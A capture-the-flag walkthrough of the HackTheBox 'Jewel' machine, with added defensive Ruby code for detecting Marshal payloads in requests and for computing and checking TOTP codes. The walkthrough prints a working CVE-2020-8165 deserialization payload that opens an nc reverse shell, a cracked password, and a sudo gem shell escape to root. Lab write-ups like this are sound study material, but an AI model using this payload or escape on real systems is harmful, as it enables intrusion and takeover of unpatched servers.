
HackTheBox Jewel walkthrough

Scanning

(screenshot: port scan results)

We found port 22 for SSH and ports 8000 and 8080 for HTTP, where port 8000

Let's add jewel.htb to our hosts file.

(screenshot: hosts file entry)

Enumeration

Port 8000

(screenshot: the site on port 8000)

Port 8080

(screenshot: the site on port 8080)

Let's enumerate the blog. We found two users: Bill and Jennifer.

Let's enumerate the repo. (screenshot: repository listing)

After some enumeration I found an SQL file, "bd.sql", which contained some password hashes. (screenshot: contents of bd.sql)

I cracked Bill's hash ("spongebob") but couldn't log in with it, so let's continue enumerating. (screenshot: cracked hash)

User flag

It's using Ruby 2.5.5, so let's search for an exploit. After searching I found CVE-2020-8165. I tested all the fields and found that the vulnerable input is in the user-update fields.

Payload:

%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22U%60rm+%2Ftmp%2Ff%3Bmkfifo%20%2ftmp%2ff%3bcat%20%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+10.10.XX.XX+9001+%3e%2Ftmp%2ff%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

Change the IP to your own IP. (screenshots: payload submitted in the web form, and the resulting terminal session)
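The payload above is a URL-encoded Ruby Marshal stream: every Marshal.dump output begins with the format version bytes 0x04 0x08, which is the "%04%08" at the very start of the payload. From the defender's side, a form field that decodes to those bytes is a strong signal that someone is feeding serialized objects into the application. The following Ruby script is an added example, not code from the writeup or from the Jewel box; it decodes constructed request-log lines (the "METHOD PATH BODY" line format and the sample lines are my own) and reports the parameters whose decoded value is a Marshal stream. The serialized value it embeds is a harmless Marshal.dump of a plain string, so the script runs offline with nothing dangerous in it.

```ruby
require 'uri'

# Every Marshal.dump output starts with the format version bytes 4.8, so a
# form field that decodes to "\x04\x08..." carries a serialized Ruby object,
# which no ordinary profile-update request should ever contain.
MARSHAL_MAGIC = "\x04\x08".b

# Return the names of form parameters whose decoded value is a Marshal stream.
# URI.decode_www_form handles both %XX escapes and '+' for space, so a
# single-encoded payload is compared as raw bytes, not as text.
def marshal_params(form_body)
  URI.decode_www_form(form_body)
     .select { |_name, value| value.b.start_with?(MARSHAL_MAGIC) }
     .map(&:first)
end

# Scan request-log lines of the (constructed) form "METHOD PATH BODY" and
# collect the requests that carried a Marshal stream in some parameter.
def scan_request_log(lines)
  lines.each_with_object([]) do |line, hits|
    method, path, body = line.split(' ', 3)
    next if body.nil?
    names = marshal_params(body)
    hits << { method: method, path: path, params: names } unless names.empty?
  end
end

# Constructed sample log. Line 2 embeds a harmless Marshal.dump of a plain
# string; line 3 is double-encoded (it decodes to the text "%04%08", not the
# bytes); line 4 has the bytes mid-value, which the prefix check ignores.
SAMPLE_LOG = [
  'POST /users/update user[username]=bill&user[email]=bill%40jewel.htb',
  "POST /users/update #{URI.encode_www_form('user[username]' => Marshal.dump('hello'))}",
  'GET /articles q=%2504%2508',
  'GET /search q=abc%04%08'
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_request_log(SAMPLE_LOG).each do |hit|
    puts "#{hit[:method]} #{hit[:path]}: Marshal stream in #{hit[:params].join(', ')}"
  end
end
```

Only the second sample line is reported. The prefix check is deliberately strict: a Marshal stream fed to Marshal.load has to start with the version bytes, so matching them anywhere in a value would only add noise. In a real deployment the same check belongs in a WAF rule or a Rails request-logging filter rather than in a post-hoc log scan, and the root fix for CVE-2020-8165 is upgrading Rails so user-controlled data is never passed to Marshal.load.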

$ su bill
Password: 
bill@jewel:~$ whoami
bill
The password is "spongebob", the one we cracked earlier, if you remember. Let's upgrade our shell.

(screenshot: SSH session as bill)

Root flag

As the first step of enumeration I listed the home directory and found a Google Authenticator file; it looks like the admin uses 2FA. Let's get the secret key and use it with Google Authenticator.

(image: https://i.ibb.co/RghXZSW/cmd10.jpg)
(image: https://i.ibb.co/GTBN0Wz/auth-1.jpg)
(image: https://i.ibb.co/QcTKwXY/auth-2.jpg)

Let's generate the OTP. (screenshot: OTP generated)

Let's use the OTP:

(image: https://i.ibb.co/MM9SNFy/cmd11.jpg)

Looks like something is wrong. This step blew my mind; I searched a lot and asked for a nudge on the HTB Discord server. Someone told me it is about syncing with the victim box, so let's see:

(image: https://i.ibb.co/PCjNDwg/cmd123.jpg)

The timezone is different, so let's set our machine to the victim's timezone. (screenshots: setting the timezone)

Let's try to escalate privileges again:

(image: https://i.ibb.co/1M7W8dv/priv.jpg)

Bam! It's working.

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

(screenshot: result of the sudo command)
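The OTP only started working once the attacking machine's clock agreed with the box. That is inherent to TOTP: the code is an HMAC over the Unix epoch time divided into 30-second steps, and the verifier only tolerates a small number of steps of drift. The Ruby script below is an added example, not code from the writeup or from the Jewel box; it implements HOTP/TOTP from the stdlib (OpenSSL::HMAC plus a small base32 decoder, since Google Authenticator stores the secret in base32 in ~/.google_authenticator) and a verifier with a configurable acceptance window. The window default of 1 step on either side matches my understanding of google-authenticator's default of 3 permissible codes, and the assumption that the box's sudo 2FA is pam_google_authenticator is mine; the secret used is the RFC 6238 test key, and the clock-skew scenario is constructed.

```ruby
require 'openssl'

# RFC 4648 base32 decoder. Google Authenticator stores the shared secret in
# this alphabet, and Ruby's stdlib has no base32 support.
BASE32_ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'

def base32_decode(str)
  bits = str.upcase.delete('= ').chars.map do |c|
    idx = BASE32_ALPHABET.index(c) or raise ArgumentError, "bad base32 char #{c.inspect}"
    idx.to_s(2).rjust(5, '0')
  end.join
  [bits[0, bits.length - bits.length % 8]].pack('B*') # drop trailing padding bits
end

# HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, dynamic
# truncation on the low nibble of the last byte, then reduce to N digits.
def hotp(secret_bytes, counter, digits = 6)
  hmac = OpenSSL::HMAC.digest('sha1', secret_bytes, [counter].pack('Q>'))
  offset = hmac.getbyte(19) & 0x0f
  code = (hmac[offset, 4].unpack1('N') & 0x7fffffff) % (10**digits)
  code.to_s.rjust(digits, '0')
end

# TOTP (RFC 6238): the counter is the Unix epoch time divided into 30-second
# steps, so what must agree between client and server is the clock itself.
def totp(secret_b32, unix_time, step = 30, digits = 6)
  hotp(base32_decode(secret_b32), unix_time / step, digits)
end

# Verifier side: accept the code if it matches the current step or any step
# within +/- window. window = 1 corresponds to google-authenticator's default
# of 3 permissible codes (previous, current, next), i.e. about 30 s of drift.
def totp_valid?(secret_b32, code, server_time, window: 1, step: 30)
  (-window..window).any? { |w| totp(secret_b32, server_time + w * step, step) == code }
end

# Base32 of the RFC 6238 test key "12345678901234567890" (constructed demo secret).
RFC6238_SECRET = 'GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ'

# Constructed scenario: same secret on both sides, but the client's clock is
# skew_seconds ahead of the server, as in the writeup before syncing.
def clock_skew_demo(server_time = 1_111_111_109, skew_seconds = 120)
  {
    in_sync: totp_valid?(RFC6238_SECRET, totp(RFC6238_SECRET, server_time), server_time),
    skewed: totp_valid?(RFC6238_SECRET, totp(RFC6238_SECRET, server_time + skew_seconds), server_time)
  }
end

if __FILE__ == $PROGRAM_NAME
  puts totp(RFC6238_SECRET, 59) # RFC 6238 test vector for T=59: 287082
  p clock_skew_demo             # {:in_sync=>true, :skewed=>false}
end
```

A 120-second skew is four steps away from the server's counter, so the client's code falls outside a one-step window and is rejected, which is exactly the failure seen in the writeup. The window is the defender's knob: widening it (google-authenticator offers up to 17 codes) tolerates more drift but also gives an attacker who steals a code a longer replay period and more guesses per brute-force attempt; keeping it narrow and running NTP on the host is the usual choice.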

Thanks for reading, I hope you enjoyed it.

This post is licensed under CC BY 4.0 by the author.